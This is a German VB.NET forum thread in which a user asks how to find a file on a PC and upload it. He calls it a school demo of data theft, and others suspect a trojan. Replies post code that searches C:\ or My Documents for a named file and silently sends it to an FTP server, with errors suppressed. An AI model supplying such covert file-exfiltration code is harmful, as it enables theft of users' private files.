Datei suchen und dann Uploaden

  • VB.NET

Es gibt 39 Antworten in diesem Thema. Der letzte Beitrag () ist von Max.Clemens.


    1. Das ist mein 2 Account, weil mein erster seit 2009 gebannt ist wegen einem andrem Schwachkopf.
    2. Ich denke ich habe genug Erfahrung mit Basic.
    3. Woher willst du denn wissen das er damit einen Trojaner bastelt?
    4. Nur weil ich 12 Beiträge hab, bin ich nit doof, tja unser Vaterland system halt, es kommt immer auf die Zahlen an: Alter, Gewicht, Noten...

    jetzt mal ganz langsam...
    1. = Nein, das darf man nicht(ich könnte mir auch vorstellen warum du gebannt wurdest...)
    2. Genug für was? Alles ist relativ etc...
    3. Es gibt immer starke Hinweise(wobei ich anscheinend bisher der einzige bin, der das ganze verstanden hat...
    4. Zahlen sagen oftmals viel aus, aber nicht immer...

    Kangaroo mag sich geirrt haben(muss nicht sein, kommt auf die Datei drauf an...) trotzdem ist er deshalb nicht gleich ein "Schwachkopf"(ich wäre nicht so sicher, ob du so toll bist und besser bist als er, da Worte sehr viel aussagen können und so wie mir diese Beiträge ins Auge gestochen sind ist er wohl Eindeutig besser - zwar nur eine starke Vermutung, aber kannst ja das Gegenteil beweisen, dann aber bitte ohne verletzende Wörter..)

    @ TE:
    msdn.microsoft.com/en-us/library/14tx8hby%28v=vs.71%29.aspx
    damit bekommst du spezielle Ordner und somit kannst du auch an den User Ordner kommen...
    mit IO.Path.Combine einfach mit deinem gegebenen Pfad verbinden...
    Ich wollte auch mal ne total überflüssige Signatur:
    ---Leer---
    @Kangouruu und den anderen die genauso denken:

    Diese such und upload funktion dient lediglich einen Informatikprojekt, wo wir zeigen sollen, wie leicht man sachen klauen oder phishen kann...
    Ich hab mich dafür entschieden ein Programm zu machen und mein Freund macht eine Phishing seite.
    Es ist mir egal ob ihr es glaubt oder nicht, aber ich sage die wahrheit.

    @Max.Clemens vielen Dank für die Antwort, Thread kann geclosed werden.
    @jvbsl
    (muss nicht sein, kommt auf die Datei drauf an...)
    es dient wie schon gesagt, nur zur demonstration, und deshalb sind es auch nur textdateien in die wir vorher was reinschreiben...Ich erkläre bei diesem Projekt nicht wie man sowas macht, ich demonstriere nur, falls das jetzt welche denken.



    mfg Rinecamo

    Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von „Rinecamo“ ()

    @Max.Clemens

    dein Code klappt nicht, oder ich hab was vergessen...

    So sieht der immoment aus....

    Quellcode

    1. Try
    2. Dim Array() As String = Nothing
    3. Array = System.IO.Directory.GetFiles("C:\", ".txt", IO.SearchOption.AllDirectories)
    4. For Each File As String In Array
    5. If File.EndsWith("test123.txt") Then
    6. My.Computer.Network.UploadFile("File", "ftp://ftp/test123.txt", "user", "pw", True, 500)
    7. Exit For
    8. End If
    9. Next
    10. Catch ex As Exception
    11. End Try


    hab ich da was vergessen?

    VB.NET-Quellcode

    1. System.Environment.GetFolderPath(MyDocuments) 'gibt dir die Eigenen Dateien zurück...

    mach doch etwas daraus, wenn du vom aktuellen Benutzer willst...wenn du(angeblich) sogar den kompletten Pfad außer das User verzeichnis hast...

    Wenn du auf C suchst ist klar, dass dies nicht funktioniert/ewig dauert...
    Ich wollte auch mal ne total überflüssige Signatur:
    ---Leer---
    Der Code ist jetzt so, aber es gibt ein Problem, dass er beim ersten Fehler anhält, liegt die Datei jedoch in C und mache ich bei der suche IO.SearchOption.TopDirectoryOnly, sucht er nur die einzelnen Dateien genau in c und nicht in den Unterordnern ab, also müsste man dafür sorgen, dass er bei einem Fehler nicht Anhält.

    VB.NET-Quellcode

    1. Try
    2. Dim Array() As String = Nothing
    3. Array = System.IO.Directory.GetFiles("C:\", "*.*", IO.SearchOption.AllDirectories)
    4. For Each File As String In Array
    5. If File.EndsWith("asdfgh.txt") Then
    6. My.Computer.Network.UploadFile(File, "ftp", "user", "pw")'Wichtig die Var File nich in Anführungszeichen setzten
    7. MsgBox("Gefunden") 'Kann eig. entfernt werden, dien nur zur Kontrolle bei tests
    8. Exit For
    9. End If
    10. Next
    11. Catch ex As Exception
    12. MsgBox("Fehler: " & ex.Message)'Hier wirft er einen Fehler aus, das er nicht in ein Verzeichnis kommt und hört auf zusuchen
    13. End Try


    EDIT, mit code von jvbsl:

    VB.NET-Quellcode

    1. Try
    2. Dim Array() As String = Nothing
    3. Array = System.IO.Directory.GetFiles(System.Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments), "*.*", IO.SearchOption.AllDirectories) 'Hier kannst du den Ordner nochmal anpassen
    4. For Each File As String In Array
    5. If File.EndsWith("fssd.txt") Then
    6. My.Computer.Network.UploadFile(File, "ftp", "user", "pass") 'File nit in Anführungszeichen
    7. MsgBox("Gefunden: " & File) 'Kontrolle, kann nach eigenen Anpassungen entfernt werden
    8. Exit For
    9. End If
    10. Next
    11. Catch
    12. End Try

    Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von „Max.Clemens“ ()

    ich hätte auch noch ne idee, weil das immernoch nich klappt...
    also man könnte doch theoretisch irgendwie den namen des benutzers, irgendwie suchen...
    das wäre dann ja ne variable, und die könnte man dann ja in den pfad einfügen...
    geht sowas?
    Er möchte gerne fertigen funktionierenden Code, er weiß nicht wie man Strings verknüpft usw...
    also würde ich mal sagen, lesen: openbook.galileocomputing.de/einstieg_vb_2008/
    Ich wollte auch mal ne total überflüssige Signatur:
    ---Leer---
    mhh würde ich ja gern aber ich bin immoment mit ner anderen programmiersprache beschäftigt, und hab keine lust parallel 2 prog. sprachen zu lernen...naja dann is ja auch egal...thread kann dann geswchlossen werden...

    Rinecamo schrieb:

    mhh würde ich ja gern aber ich bin immoment mit ner anderen programmiersprache beschäftigt, und hab keine lust parallel 2 prog. sprachen zu lernen

    kleines beispiel zum strings verknüpfen:

    VB.NET-Quellcode

    1. dim name as string = "Gugi"
    2. dim alter as integer = 13
    3. dim frage as string " und wie alt bist du?"
    4. MessageBox.Show("Mein Name ist " & name & ", ich bin " & alter & " Jahre alt, " & frage)


    lg Gugi